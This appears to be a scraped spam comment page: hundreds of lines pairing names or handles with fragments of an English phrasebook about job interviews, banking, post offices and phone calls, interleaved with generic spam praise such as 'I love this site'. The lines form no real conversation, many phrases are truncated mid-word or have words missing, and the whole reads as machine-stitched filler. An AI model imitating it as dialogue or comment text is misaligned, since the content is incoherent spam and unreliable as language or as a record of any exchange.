Stacy : Could you send me an application form? .
Caleb : Are you a student? .
Cesar : I came here to work .
Nicky : I'd like to tell you about a change of address .
Walker : A few months .
Giovanni : What are the hours of work? .
Paris : I hate shopping .
Roman : Looking for work .
Lawrence : About a year .
Kevin : What are the hours of work? .
Stephen : It's serious .
Blake : Other amount .
Tobias : An envelope .
German : I'm doing an internship .
Phillip : How do I get an outside line? .
Elliott : How long have you lived here? .
Jozef : Directory enquiries .
Graham : We'd like to invite you for an interview c .
Damian : Do you know what extension he's on? .
Ollie : Until August .
Jacob : An estate agents .
Diana : Canada>Canada .
Jamel : Do you know each other? .
Boris : Another service? .
Kimberly : Could I have an application form? .
Jospeh : I'd like to pay this cheque in, please .
Clifford : A book of First Class stamps .
Jeffrey : How much will it cost to send this letter to ? .
Carson : I'd like to order some foreign currency .
Lanny : What do you want to do when you've finished? .
Jamel : Free medical insurance .
Henry : Could I ask who's calling? .
Billy : What are the hours of work? .
Preston : I'm doing a masters in law .
Leigh : I came here to study .
Tracy : How do you do? .
Johnson : I can't stand football .
Grady : On another call .
Mackenzie : Looking for work .
Irea : How long are you planning to stay here? .
Luther : I'm sorry, she's .
Colin : I'm doing a phd in chemistry .
Ezequiel : I never went to university .
Graig : I'd like to pay this in, please .
Eldridge : Go travelling .
Rosario : I'd like to order some foreign currency .
Hollis : I've come to collect a parcel .
Sammie : What do you do for a living? .
Rodney : I'm happy very good site .
Kenny : Can you put it on the scales, please? .
Jose : I was made redundant two months ago .
Tyler : Insert your card .
Arlie : Can you put it on the scales, please? .
Kayla : Can you put it on the scales, please? .
Jeremy : We need someone with qualifications .
Alvaro : The manager .
Benito : I'm doing a masters in law .
August : We'd like to invite you for an interview .
Clayton : I'd like some euros .
Virgil : Which university are you at? .
Virgil : I work for a publishers .
Hipolito : I'm retired w .
Shelton : How much will it cost to send this letter to ? .
Booker : I'll send you a text .
Virgilio : Accountant supermarket manager .
Darell : I'm a housewife .
Hassan : An envelope .
Brooklyn : I've come to collect a parcel .
Coleman : I really like swimming .
Major : Canada>Canada .
Agustin : I'd like to send this to .
Rudolph : Would you like a receipt? .
Clayton : I'd like to open a personal account .
Bobber : Punk not dead .
Ronny : Other amount .
Trenton : I love this site .
Carmelo : Yes, I love it! .
Jarrett : We've got a joint account .
Roderick : How much does the job pay? .
Ulysses : This is the job description .
Bertram : I'd like a phonecard, please .
Getjoy : I'm interested in .
Goodsam : What company are you calling from? .
Esteban : How much notice do you have to give? .
Sergio : Good crew it's cool :) .
Colby : I'm interested in .
Frank : Lost credit card .
Bonser : It's OK .
Fletcher : magic story very thanks .
Bailey : Did you go to university? .
Alexis : Have you got any experience? .
Moises : Can I call you back? .
Avery : We went to university together .
Jefferson : very best job .
Rodolfo : I'm in my first year at university .
Ralph : The line's engaged .
Barton : Three years .
Hunter : Where are you from? .
Genaro : I'm sorry, I didn't catch your name .
Mathew : Yes, I play the guitar .
Willard : I went to .
Everett : We'd like to invite you for an interview .
Genesis : A law firm .
Devon : What qualifications have you got? .
Rubin : I need to charge up my phone .
Antone : A few months .
Korey : I'd like to change some money .
Allen : I'm training to be an engineer .
Courtney : What do you do? .
Sydney : I'm on work experience .
Hilario : I'm self-employed .
Marlon : I live in London .
Samantha : We used to work together .
Coco888 : i'm fine good work .
Carter : Get a job .
Hubert : good material thanks .
Dusty : Do you have any exams coming up? .
Clark : A staff restaurant .
Forest : What are the hours of work? .
Nathanael : Could I have a statement, please? .
Mario : I'd like to apply for this job .
Lillian : How much were you paid in your last job? .
Michale : How much notice do you have to give? .
Pitfighter : I'm doing a phd in chemistry .
Nelson : How much will it cost to send this letter to ? .
Mckinley : In tens, please (ten pound notes) .
Bobbie : I have my own business .
Jefferey : The National Gallery .
Bradley : The manager .
Kaitlyn : We'll need to take up references .
Rodolfo : I like watching TV .
Weldon : real beauty page .
Stefan : History .
Charlie : Could I have an application form? .
Fausto : I'd like to order some foreign currency .
Vaughn : The National Gallery .
Mickey : Stolen credit card .
Fernando : Pleased to meet you .
Lyman : I'll text you later .
Brain : Have you got any qualifications? .
Brice : US dollars .
Israel : I live here .
Clarence : What sort of work do you do? .
Willis : I'll put him on .
Dogkill : I've only just arrived .
Walker : Remove card .
Archie : Where did you go to university? .
Reginald : A book of First Class stamps .
Haley : I was born in Australia but grew up in England .
Duane : Just over two years .
Maurice : A First Class stamp .
Vaughn : A Second Class stamp .
Jospeh : Do you play any instruments? .
Buford : I'm sorry, she's .
Jarrett : We were at school together .
Luciano : Can I use your phone? .
Alfredo : I went to .
Bennie : A staff restaurant .
Emanuel : I live in London .
Rachel : I came here to study .
Tomas : I want to report a .
Cecil : How many more years do you have to go? .
Tracy : Canada>Canada .
Unlove : I'm not interested in football .
Robbie : Where did you go to university? .
Jamie : How many more years do you have to go? .
Crazyivan : I'm retired .
Jeremiah : Do you like it here? .
Williams : Which year are you in? .
Roger : History .
Jerrold : We were at school together .
Darryl : I can't get through at the moment .
Carter : I'm on holiday .
Paris : Enter your PIN .
Carson : Sorry, I'm busy at the moment .
Nicolas : Could you tell me the dialing code for ? .
Alfred : I'm on work experience .
Jonah : Your cash is being counted .
Zachariah : I'd like to apply for this job .
Brady : I like it a lot .
Marcel : We work together .
Jesse : Very interesting tale .
Kyle : Where do you come from? .
Darren : Whereabouts in are you from? .
Jennifer : How many are there in a book? .
Toney : I study here .
Cooler111 : Do you know what extension he's on? .
Salvador : Which university are you at? .
Jimmy : Do you play any instruments? .
Incomeppc : On another call .
Luciano : Another year .
Layla : It's a bad line .
Santo : Is it convenient to talk at the moment? .
Hyman : Can I use your phone? .
Abdul : Yes, I love it! .
Bobby : Hello good day .
Arthur : How much were you paid in your last job? .
Taylor : Would you like a receipt? .
Alfonzo : Withdraw cash .
Walker : Incorrect PIN .
Ashley : I do some voluntary work .
Valentine : Do you need a work permit? .
Bennie : Looking for work .
Galen : Which team do you support? .
Byron : Who would I report to? .
Thebest : Which university are you at? .
Abigail : Go travelling .
Filiberto : International directory enquiries .
Cortez : We need someone with qualifications .
Jarrod : What do you do? .
Carter : I'm a trainee .
Stephan : Very funny pictures .
Toney : Could you tell me my balance, please? .
Carmine : Very funny pictures .
Donovan : I work for a publishers .
Wally : I'd like to withdraw $100, please .
Tyson : What's the last date I can post this to to arrive in time f .
Mohamed : Sorry, I ran out of credit .
Randolph : I like watching football .
Jerald : How much is a First Class stamp? .
Trevor : Cool site goodluck :) .
Wilbur : This is your employment contract .
Bonser : I've only just arrived .
Sydney : Why did you come to ? .
Joshua : Where do you come from? .
Efrain : Do you like it here? .
Ethan : Is there ? .
Donte : I'm on work experience .
Alexandra : I work for myself .
Emile : Looking for a job .
Hiram : I'm retired .
Denny : International directory enquiries .
Darrin : I'm from England .
Jackie : Do you need a work permit? .
Anthony : I live in London .
Sherwood : very best job .
Jayson : Sorry, I'm busy at the moment .
Ezequiel : Where's the nearest cash machine? .
Rocky : Who would I report to? .
Alonso : I'm doing a masters in law .
Blaine : A staff restaurant .
Errol : perfect design thanks .
Orville : I'm interested in .
Jackson : A few months .
Ava : Your account's overdrawn .
Leah : real beauty page .
Broderick : Jonny was here .
Edmund : Which year are you in? .
Jayson : Have you got a current driving licence? .
Henry : I want to make a withdrawal .
Dro4er : I do some voluntary work .
Connor : Jonny was here .
Raymond : Whereabouts are you from? .
Tilburg : Wonderfull great site .
Jeffrey : In tens, please (ten pound notes) .
Shane : A financial advisor .
Denver : Hello good day .
Natalie : I want to report a .
Cooper : Remove card .
Weldon : I've been cut off .
Scott : I'd like to pay this in, please .
Emery : I've got a part-time job .
Vida : I'd like to change some money .
Stuart : I live in London .
Fabian : I need to charge up my phone .
Carrol : Could you give me some smaller notes? .
Pablo : I'd like to send this letter by .
Landon : I'm a trainee .
Mary : We've got a joint account .
Alejandro : I like watching football .
Russell : I'm only getting an answering machine .
Dwight : What's the exchange rate for euros? .
Zachary : An accountancy practice .
Clarence : Accountant supermarket manager .
Jessica : Lost credit card .
Brain : I work for myself .
Monty : What's the current interest rate for personal loans? .
Hipolito : I'd like to open a personal account .
Kendrick : What university do you go to? .
Werner : Languages .
Gerald : I was born in Australia but grew up in England .
Levi : There's a three month trial period .
Bobbie : I'm not interested in football .
Manual : How many are there in a book? .
Dro4er : I'd like to order some foreign currency .
Monroe : Where do you live? .
Benjamin : Can you put it on the scales, please? .
Ellsworth : Can I take your number? .
Kelvin : Do you have any exams coming up? .
Giovanni : The manager .
Ernesto : Where are you from? .
Carlos : What part of do you come from? .
Donte : I don't like pubs .
Marquis : What do you want to do when you've finished? .
Gregory : About a year .
Louie : Stolen credit card .
Harland : Other amount .
Virgilio : I'd like to pay this cheque in, please .
Eugenio : I've come to collect a parcel .
Lyndon : I enjoy travelling .
Sophia : I'd like to tell you about a change of address .
Warner : Whereabouts in are you from? .
Milford : Nice to meet you .
Nicolas : Where do you study? .
Alyssa : Could I ask who's calling? .
Friend35 : There's a three month trial period .
Landon : Could you tell me the number for ? .
Leah : Have you read any good books lately? .
Wilbert : What's the last date I can post this to to arrive in time f .
Tanner : Have you seen any good films recently? .
Rafael : I love this site .
Landon : I can't stand football .
Stephan : Where do you study? .
Doyle : Where do you study? .
Dghonson : I quite like cooking .
Winston : I can't hear you very well .
Carlos : Could you ask him to call me? .
Antony : We went to university together .
Sherwood : I'd like to open a business account .
Plank : International directory enquiries .
Basil : Languages .
Angel : I'm originally from Dublin but now live in Edinburgh .
Timothy : I need to charge up my phone .
Hilario : Your account's overdrawn .
Archie : Do you know each other? .
Gabrielle : Could you give me some smaller notes? .
Antwan : A few months .
Louis : I'm on business .
Markus : What sort of work do you do? .
Louie : Best Site good looking .
Jerome : Please wait pr .
Claud : Will I get paid for overtime? .
Marquis : Insert your card .
Eva : I'd like to send this to .
Angel : I love this site .
Tyson : I'll send you a text .
Josiah : Could I have an application form? .
Gerard : What company are you calling from? .
Dwain : This is your employment contract .
Lucien : I'd like to send this parcel to .
Reinaldo : A pension scheme .
Alexa : I work for myself .
Nicolas : I never went to university .
Arnold : A law firm .
Doyle : Can you hear me OK? .
Porfirio : Would you like to leave a message? .
Cristobal : Canada>Canada .
Erwin : I can't get a signal .
Nathanial : Best Site Good Work .
Jonathon : A Second Class stamp .
Leandro : Would you like to leave a message? .
Merrill : Other amount .
Bobbie : I'm training to be an engineer .
Pedro : Is it convenient to talk at the moment? .
Shane : I need to charge up my phone .
Michael : I've lost my bank card .
Coolman : Do you know the address? .
Maximo : I'd like to open an account .
Dewitt : Go travelling .
Mario : I'd like to cancel a cheque .
Steep777 : Could you tell me my balance, please? .
Manuel : I'm happy very good site .
Armando : Did you go to university? .
Marlon : One moment, please .
Raymon : A First Class stamp .
Desmond : Lost credit card .
Adolfo : This is your employment contract .
Darrell : this is be cool 8) .
Katherine : Where did you go to university? .
Roger : Do you know each other? .
Royal : Would you like a receipt? .
Patrick : Do you know the number for ? .
Rhett : I didn't go to university .
Ian : Did you go to university? .
Marcellus : Can I call you back? .
Emilio : International directory enquiries .
Jefferson : I can't get through at the moment .
Hilario : Other amount .
Melvin : very best job .
Allen : It's funny goodluck .
Laverne : I'd like to send this letter by .
Cedrick : Good crew it's cool :) .
Jayson : What's the last date I can post this to to arrive in time f .
Dewayne : Can you put it on the scales, please? .
Moises : What do you do for a living? .
Manuel : I've just started at .
Jefferson : How long are you planning to stay here? .
Sean : I enjoy travelling .
Stuart : Jonny was here .
Jimmie : Would you like a receipt? .
Nigel : It's serious .
Manuel : Have you got any experience? .
Octavio : Could you transfer $1000 from my current account to my depos .
Zachery : I need to charge up my phone .
Jasper : Have you got a current driving licence? .
Herschel : Lost credit card .
Derrick : What sort of music do you listen to? .
Dalton : What are the hours of work? .
Kraig : Have you read any good books lately? .
Delbert : Whereabouts in are you from? .
Hershel : How much does the job pay? .
Donnell : What do you do? .
Lanny : How do you spell that? .
Willis : I'm sorry, she's .
Juan : What do you study? .
Mackenzie : A pension scheme .
Tanner : I saw your advert in the paper .
Dominic : Punk not dead .
Sophia : Please wait .
Isabelle : Some First Class stamps .
Gilberto : Which year are you in? .
Billie : Hello good day .
Glenn : A First Class stamp .
Angelina : What do you like doing in your spare time? .
Osvaldo : Did you go to university? .
Renato : Do you need a work permit? .
Myles : Who would I report to? .
Lemuel : Will I be paid weekly or monthly? .
Vernon : this is be cool 8) .
Cristobal : Accountant supermarket manager .
Wilburn : Have you read any good books lately? .
Terrence : I like it a lot .
Colby : I work for myself .
Tracey : Your account's overdrawn .
Miles : Not in at the moment .
Allison : A few months .
Sonny : Very Good Site .
Wilfredo : I've come to collect a parcel .
Willie : I'm afraid that number's ex-directory .
Arturo : I really like swimming .
Gustavo : International directory enquiries .
Arturo : Incorrect PIN .
Damion : Is it convenient to talk at the moment? .
Fredric : One moment, please .
Brenton : Good crew it's cool :) .
Evelyn : I'm a housewife .
Marquis : How many would you like? .
Jamar : Do you know each other? .
Alyssa : I didn't go to university .
Isaiah : This site is crazy :) .
Noah : The National Gallery .
Shayne : Whereabouts are you from? .
Jackie : I'd like a phonecard, please .
Reginald : I'll put him on .
Jackson : Yes, I love it! .
Rocky : I can't get a dialling tone .
Dorian : What line of work are you in? .
Ethan : I'm not interested in football .
Irvin : Will I have to work shifts? .
Andreas : How much were you paid in your last job? .
Perry : Could I order a new chequebook, please? .
Shelby : Do you know the number for ? .
Freddy : I'm happy very good site .
Erin : Your cash is being counted .
Neville : I never went to university .
Bernardo : We've got a joint account .
Dwight : I'm sorry, she's .
Zoey : I'd like to open a business account .
Mikel : real beauty page .
Lindsay : How do you know each other? .
Craig : How much is a Second Class stamp? .
Virgil : I'm on business .
Cyrus : I didn't go to university .
Dannie : I saw your advert in the paper .
Palmer : Through friends .
Clinton : I'm originally from Dublin but now live in Edinburgh .
Clinton : Very interesting tale .
Carol : Whereabouts in are you from? .
Santiago : Is this a temporary or permanent position? .
Lillian : This site is crazy :) .
Dennis : I've just graduated .
Charlotte : This is the job description .
Jerrod : Very funny pictures .
Harry : I'd like some euros .
Morton : Yes, I play the guitar .
Theron : What company are you calling from? .
Sanford : This site is crazy :) .
Kyle : I'll send you a text .
Eugenio : Could you give me some smaller notes? .
Denis : I read a lot .
Rocky : Could you send me an application form? .
Adam : Which university are you at? .
Weston : I've got a part-time job .
Dante : This site is crazy :) .
Felix : International directory enquiries .
Jacob : Go travelling .
Raphael : I'll text you later .
Abram : We'll need to take up references .
Claude : An estate agents .
Alton : A pension scheme .
Gonzalo : I'd like to open a business account .
Clarence : We need someone with experience .
Edward : Do you like it here? .
Victor : Where's the postbox? .
Arthur : I'd like to cancel this standing order .
Jarod : I'm afraid that number's ex-directory .
Sean : Would you like to leave a message? .
Vicente : My battery's about to run out .
Rikky : What sort of music do you like? .
Trinity : I'm unemployed .
George : We need someone with experience .
Michael : I'll send you a text .
Richie : Gloomy tales .
Ramon : Do you know what extension he's on? .
Connie : Special Delivery .
Renaldo : I've just started at .
Emmitt : Excellent work, Nice Design .
Millard : Looking for work .
Martin : US dollars .
Danny : We'd like to invite you for an interview .
Mitchell : I like watching TV .
Merlin : Not in at the moment .
Harley : I like it a lot .
Tilburg : I live in London .
Bernardo : Incorrect PIN .
Humberto : I work for myself .
Eldridge : This is the job description .
Vernon : A Second Class stamp .
Ricardo : Recorded Delivery .
Ervin : We'd like to invite you for an interview .
Dewayne : I live in London .
Diego : I saw your advert in the paper .
Chase : What's the interest rate on this account? .
Rudolf : Do you know the address? .
Isaac : I'm training to be an engineer .
Leah : I like watching TV .
Jerrold : Punk not dead .
Major : How much will it cost to send this letter to ? .
Andres : An accountancy practice .
Oscar : I'm on a course at the moment .
Clair : I can't get a signal .
Archie : I've been made redundant .
Prince : Would you like a receipt? .
Darrin : Will I get travelling expenses? .
Melissa : What sort of work do you do? .
Thaddeus : I've lost my bank card .
Molly : I was made redundant two months ago .
Edwin : I've been made redundant .
Stewart : Just over two years .
Jasper : I'd like a phonecard, please .
Manual : We'll need to take up references .
Brice : How much is a Second Class stamp? .
Brock : Whereabouts in are you from? .
Ariel : Do you need a work permit? .
Kenny : I do some voluntary work .
Numbers : Is it convenient to talk at the moment? .
Jack : I'd like to send this parcel to .
Isreal : A pension scheme .
Damion : I've been made redundant .
Harry : Thanks for calling .
Forrest : No, I'm not particularly sporty .
Maynard : We used to work together .
Armand : I'm about to run out of credit .
Eldridge : We were at school together .
Darrel : I'd like a phonecard, please .
Diana : Where are you from? .
Steep777 : Could I make an appointment to see ? .
Deandre : I'd like to withdraw $100, please .
Angelo : Where are you from? .
Jorge : A law firm .
Randal : Could you ask her to call me? .
Charlotte : A few months .
Mohammad : Best Site Good Work .
Sandy : This is your employment contract .
Blake : I'd like to send this letter by .
Brendan : It's a bad line .
Stewart : Children with disabilities .
David : On another call .
Johnnie : Would you like a receipt? .
Sergio : Have you got any experience? .
Douglas : What do you want to do when you've finished? .
Danielle : What sort of work do you do? .
Forrest : It's a bad line .
Bobby : I'm at Liverpool University .
Brody : I'm a partner in .
Shannon : What do you want to do when you've finished? .
Junior : Best Site good looking .
Bernardo : When do you want me to start? .
Ramon : How do you do? .
Oscar : When can you start? .
Titus : Hello good day .
Rubin : Good crew it's cool :) .
Lanny : We were at school together .
Alfred : Could I order a new chequebook, please? .
Gerald : Your cash is being counted .
Dominick : What sort of music do you like? .
Louie : Yes, I play the guitar .
Marissa : Will I get travelling expenses? .
Scott : We were at school together c .
Tyler : Would you like a receipt? .
Jerry : I'd like to change some money .
Garret : I'm on work experience .
Garland : I can't get through at the moment .
Earnest : This is your employment contract .
Elvin : I work with computers .
Kurtis : How would you like the money? .
Wilton : About a year .
Rickey : I'd like to change some money .
Tomas : Where's the nearest cash machine? .
Elias : We're at university together .
Brenton : I've got a part-time job .
Genesis : Could I borrow your phone, please? .
Tyler : I've only just arrived .
Isreal : Which university are you at? .
Larry : I'm in a band .
Joshua : How much notice do you have to give? .
Deandre : A jiffy bag .
Garth : Cool site goodluck :) .
Tyrone : Please call back later .
Tyron : How many are there in a book? .
Carmelo : I'd like to apply for this job .
Khloe : Have you got any ? .
Michal : How much notice do you have to give? .
Kelley : An estate agents .
Getjoy : Do you have any exams coming up? .
Cesar : Can I use your phone? .
Jaime : Could I have , please? .
Antony : A packet of envelopes .
George : I'd like to send this letter by .
Aaliyah : Sorry, you must have the wrong number .
Barry : I'd like to cancel a cheque .
Merle : I'm on a course at the moment .
Kaylee : I've got a part-time job .
Augustus : Lost credit card .
Bob : I've been made redundant .
David : I live in London .
Nicky : Stolen credit card .
Enoch : This site is crazy :) .
Sergio : I'm from England .
Gaston : I live in London .
Henry : We'd like to offer you the job .
Spencer : I'd like to transfer some money to this account .
Cliff : I can't get a signal .
Rolando : I'm self-employed .
Mike : Could I have , please? .
Loren : It's OK .
Cornelius : My battery's about to run out .
Mohammad : Wonderfull great site .
Dominic : I'm on a course at the moment .
Elwood : Cool site goodluck :) .
Kendrick : I'm on a course at the moment .
Evelyn : Who would I report to? .
Carlo : How much is a First Class stamp? .
Kelvin : Will I get travelling expenses? .
Sherman : I work for myself .
Russel : I'd like to withdraw $100, please .
Jerold : We need someone with qualifications .
Warren : A few months .
Jackie : How do you spell that? .
Cameron : I need to charge up my phone .
Jewell : We'd like to offer you the job .
Chauncey : Do you need a work permit? .
Raphael : We went to university together .
Jarrett : Canada>Canada .
Samantha : Wonderfull great site .
Benton : I can't get through at the moment .
Jimmy : Yes, I love it! .
Cornell : I'd like to cancel a cheque .
Edgar : Languages .
Roscoe : Would you like a receipt? .
Garrett : I'm sorry, I'm not interested .
Santos : I can't get a signal .
Antonia : Children with disabilities .
Marcelino : A Second Class stamp .
Kevin : I'm self-employed .
Phillip : We need someone with qualifications .
Lawrence : I'd like to open a business account .
Isabella : Until August .
Mohammed : I'm on business .
Claire : It's serious .
Emanuel : I came here to study .
Chung : An estate agents .
Daren : Would you like a receipt? .
Curtis : How many would you like? .
Jesse : Which year are you in? .
Antonia : Which university are you at? .
Isaias : When can you start? .
Katelyn : I can't get a dialling tone .
Malcolm : Just over two years .
Damon : Three years .
Kieth : I was born in Australia but grew up in England .
Gerardo : Will I get paid for overtime? .
Alfonzo : Who do you work for? .
Zachery : Very funny pictures .
Rogelio : Cool site goodluck :) .
Samual : How long have you lived here? .
Stanton : Who do you work for? .
Taylor : I'm interested in .
Wilton : How do you know each other? .
Jennifer : Will I have to work on Saturdays? .
Eddie : Could I take your name and number, please? .
Derick : I'm not sure .
David : Insert your card .
Ahmed : I'll send you a text .
Silas : Could I have a statement, please? .
Shelby : Where's the nearest cash machine? .
Sarah : I'm in a band .
Blake : Where do you study? .
Ignacio : How much notice do you have to give? .
Whitney : How do you know each other? .
Leah : This site is crazy :) .
Vicente : Please wait .
Elliot : I'd like to open an account .
Ayden : I'll put him on .
Raphael : What's your number? .
Shirley : How many weeks' holiday a year are there? .
Kirby : No, I'm not particularly sporty .
Edmundo : A financial advisor .
Gregorio : Can you put it on the scales, please? .
Dirtbill : Will I get paid for overtime? .
Clark : I'd like to pay this in, please .
Sonny : I'm sorry, he's .
Randell : I've just started at .
Javier : How many days will it take for the cheque to clear? .
Genaro : magic story very thanks .
Joesph : I'll text you later .
Errol : Which team do you support? .
Denis : I'd like to send this parcel to .
Dwayne : Can you put it on the scales, please? .
Houston : I'd like a phonecard, please .
Bob : I came here to study .
Arlie : What do you do? .
Danny : Are you a student? .
Evelyn : How would you like the money? .
Gerard : How would you like the money? .
Ervin : I'm self-employed .
William : I'd like to send this parcel to .
Dylan : History .
Jacinto : I've only just arrived .
Melvin : I'll text you later .
Mario : I can't hear you very well .
Alexandra : I'd like to send this parcel to .
Hershel : One moment, please .
Jarrett : I've lost my bank card .
Quintin : What's the interest rate on this account? .
Natalie : I'd like to open an account .
Jeromy : How many more years do you have to go? .
Lonny : What do you do? .
Erasmo : I never went to university .
Willis : Not available at the moment .
Warner : I've got a full-time job .
Fermin : Is there ? .
Shirley : I'm self-employed .
Carroll : I need to charge up my phone .
Donte : Who would I report to? .
Willian : How much is a Second Class stamp? .
Garret : I'm sorry, I didn't catch your name .
Cornell : In tens, please (ten pound notes) .
Morris : Accountant supermarket manager .
Forest : Could you tell me the number for ? .
Percy : I'm self-employed .
Sophia : There's a three month trial period .
Bertram : I've got a full-time job .
Tyrone : What do you want to do when you've finished? .
Sofia : I'm on business .
Orval : We'd like to invite you for an interview .
Scottie : Could you tell me the dialing code for ? .
Patric : I'll send you a text .
Curt : I've only just arrived .
Wiley : I'm happy very good site .
Michelle : Have you got any ? .
Charles : How do you know each other? .
Melvin : How many weeks' holiday a year are there? .
Stephen : I wanted to live abroad .
Derrick : We used to work together .
Adolph : I work for a publishers .
Claudio : What sort of work do you do? .
Mitchell : Could I ask who's calling? .
Williams : Thanks for calling .
Korey : Yes, I love it! .
Guillermo : I'm in my first year at university .
Vincenzo : I can't hear you very well .
Kieth : I'm self-employed .
Teodoro : I'd like to open an account .
Adrian : I'm on holiday .
Freddie : I'm a housewife .
Amelia : A financial advisor .
Eugene : Is this a temporary or permanent position? .
Raymundo : Could I ask who's calling? .
Nathanial : Could I have a statement, please? .
Alexis : Could you tell me the dialing code for ? .
Augustine : We'd like to offer you the job .
Whitney : I'm sorry, she's .
Theodore : I'm about to run out of credit .
Leslie : I like watching football .
Laverne : Canada>Canada .
Leigh : Lost credit card .
Aaliyah : Very interesting tale .
Louie : Could you tell me the dialing code for ? .
Eugene : The National Gallery .
Delbert : I'm a partner in .
Brayden : I'd like to tell you about a change of address .
Reggie : I'm a trainee .
Grady : Do you know the number for ? .
Raphael : Enter your PIN .
Brock : How many weeks' holiday a year are there? .
Cooler111 : Do you like it here? .
Pitfighter : This is your employment contract .
Seymour : Could you tell me my balance, please? .
Ernie : Could I have , please? .
Madison : Very interesting tale .
Logan : It's OK .
Vince : Do you know each other? .
Anderson : We used to work together .
Collin : The United States .
Milford : I'm a member of a gym .
Kevin : I went to .
Randall : I've lost my bank card .
Silas : Very Good Site .
Esteban : How much notice do you have to give? .
Lance : Is it convenient to talk at the moment? .
Mya : Could I have an application form? .
Eva : I want to make a withdrawal .
Anna : I have my own business .
Darrick : There's a three month trial period .
Morgan : Will I have to work on Saturdays? .
Jamel : Just over two years .
Clair : A First Class stamp .
Sidney : Could you tell me my balance, please? .
Wilfredo : Yes, I play the guitar .
Chuck : I'd like some euros .
Mitch : My battery's about to run out .
Barbera : Good crew it's cool :) .
Florentino : I'm only getting an answering machine .
Theron : What do you like doing in your spare time? .
Alfred : Insert your card .
Seth : Have you got any experience? .
Alphonso : Where did you go to university? .
Brooklyn : I'll put her on .
German : How many weeks' holiday a year are there? .
Clair : Have you got a current driving licence? .
Harland : Have you got a current driving licence? .
Eblanned : Could you tell me the number for ? .
Grady : Can I take your number? .
Kurtis : I'd like to send this parcel to .
Emery : Your cash is being counted .
Cooler111 : Could you please repeat that? .
Incomeppc : I'm from England .
Hilario : I'll call back later .
Cedric : I never went to university .
Donnell : Where are you calling from? .
Jewel : I've just graduated .
Walton : Accountant supermarket manager .
Arthur : I quite like cooking .
German : Your account's overdrawn .
Merle : Which team do you support? .
Darell : Did you go to university? .
Teddy : I'd like to send this to .
Frederick : What's the interest rate on this account? .
Aurelio : A few months .
Emily : How long are you planning to stay here? .
Santos : A pension scheme .
Dogkill : I'd like to apply for this job .
Dalton : Go travelling .
Santos : How would you like the money? .
Emerson : Get a job .
Neville : Please call back later .
Douglas : I'll text you later .
Ariel : Can I call you back? .
Chauncey : Very Good Site .
Laverne : Photography .
Mauricio : One moment, please .
Antony : We need someone with experience .
Donovan : Could I make an appointment to see ? .
Wilfredo : I live in London .
Kayla : Do you know the address? .
Marcelino : Can I take your number? .
Billie : A jiffy bag .
Basil : I'm afraid that number's ex-directory .
Hilario : I've just graduated .
Pitfighter : this post is fantastic .
Kurtis : I'd like to apply for this job .
Vanessa : What sort of work do you do? .
Harley : We used to work together .
Anthony : I'm happy very good site .
Deadman : What do you study? .
Autumn : I'm a member of a gym .
Darell : I've just started at .
Forest : How many days will it take for the cheque to clear? .
Caden : Incorrect PIN .
Friend35 : Could I take your name and number, please? .
Nathan : Could you ask him to call me? .
Herman : US dollars .
Robby : In tens, please (ten pound notes) .
Emmett : What qualifications have you got? .
Autumn : Where do you come from? .
Nilson : I'm about to run out of credit .
Seymour : I enjoy travelling .
Leonel : I can't get a signal .
Elton : Whereabouts in are you from? .
Friend35 : What university do you go to? .
Carmelo : I love the theatre .
Johnie : Where did you go to university? .
Sebastian : Just over two years .
Terence : I study here .
Bailey : I'm on a course at the moment .
Dirtbill : I don't know what I want to do after university .
Rayford : Until August .
Thurman : I've been made redundant .
Roland : What part of do you come from? .
Pitfighter : I'd like to send this letter by .
Silas : I'd like a phonecard, please .
Buford : This site is crazy :) .
Donnie : I've been cut off .
Jared : An accountancy practice .
Jocelyn : Which year are you in? .
Shayne : International directory enquiries .
Connor : An accountancy practice .
Ellis : International directory enquiries .
Laverne : We're at university together .
Ellsworth : I love this site .
Harrison : We work together .
Cristobal : What sort of music do you like? .
Terence : I'd like to send this parcel to .
Graig : Could I make an appointment to see ? .
Palmer : I'm doing an internship .
Isaac : Not in at the moment .
Michal : Where's the nearest cash machine? .
Luke : Directory enquiries .
Darell : What's the interest rate on this account? .
Boyce : I can't get a signal .
Bennie : My battery's about to run out .
Jorge : good material thanks .
Angel : Good crew it's cool :) .
Harrison : A law firm .
Shelby : I don't know what I want to do after university .
Aidan : What part of do you come from? .
Damion : I don't like pubs .
Gregory : I enjoy travelling .
Kraig : What part of do you come from? .
Ryan : Could you ask her to call me? .
Billy : I like watching TV .
Jewel : Could you transfer $1000 from my current account to my depos .
Danny : Why did you come to ? .
Connor : How much is a First Class stamp? .
Loren : I live here .
Ferdinand : Not available at the moment .
Maxwell : I can't get through at the moment .
Tony : In a meeting .
Orville : I like watching TV .
Erick : I saw your advert in the paper .
Leroy : Looking for work .
Trent : I'd like to pay this cheque in, please .
Chester : How much is a Second Class stamp? .
Casey : I'm originally from Dublin but now live in Edinburgh .
Stevie : Where do you study? .
Barbera : I'm interested in .
Harlan : How would you like the money? .
Zoey : I quite like cooking .
Christian : Will I be paid weekly or monthly? .
Clarence : I was made redundant two months ago .
Pedro : Can I call you back? .
Manuel : What do you like doing in your spare time? .
Terry : Do you have any exams coming up? .
Numbers : We used to work together .
Landon : very best job .
Shane : What's your number? .
Julius : Where do you live? .
Columbus : I want to make a withdrawal .
Isreal : Sorry, I ran out of credit .
Marissa : An estate agents .
Mohamed : Where do you study? .
Arthur : I work for a publishers .
Lifestile : Insert your card .
Sean : What do you do for a living? .
Shane : A financial advisor .
Stuart : Where are you calling from? .
Claudio : Please call back later .
Lucio : I was born in Australia but grew up in England .
Nolan : We need someone with experience .
Johnny : I'd like to take the job .
Gerardo : I'm sorry, I didn't catch your name .
Royal : I like watching football .
Kidrock : Why did you come to ? .
Bobby : Can you hear me OK? .
Gabriel : An estate agents .
Pedro : A staff restaurant .
Newton : A book of First Class stamps .
Kelvin : this is be cool 8) .
Tyrone : Photography .
Ferdinand : Can you put it on the scales, please? .
Chester : Where do you study? .
Alex : I'm a partner in .
Janni : I hate shopping .
Isabel : A book of First Class stamps .
Charley : This is the job description .
Lewis : History .
Charley : Will I get paid for overtime? .
Blair : We've got a joint account .
Robby : Who's calling? .
Jules : What sort of work do you do? .
Kevin : How many weeks' holiday a year are there? .
Blair : Insufficient funds .
Mya : I live here .
Branden : I don't know what I want to do after university .
Frances : I'd like to order some foreign currency .
Joesph : Would you like to leave a message? .
Rebecca : I work for myself .
Harley : Another year .
Chase : I like it a lot .
Dorsey : Lost credit card .
Desmond : Lost credit card .
Pasquale : What sort of work do you do? .
Malik : I work for myself .
Darius : I'd like , please .
Harland : I was born in Australia but grew up in England .
Marion : It's OK .
Jonathan : How much will it cost to send this letter to ? .
Billy : I want to report a .
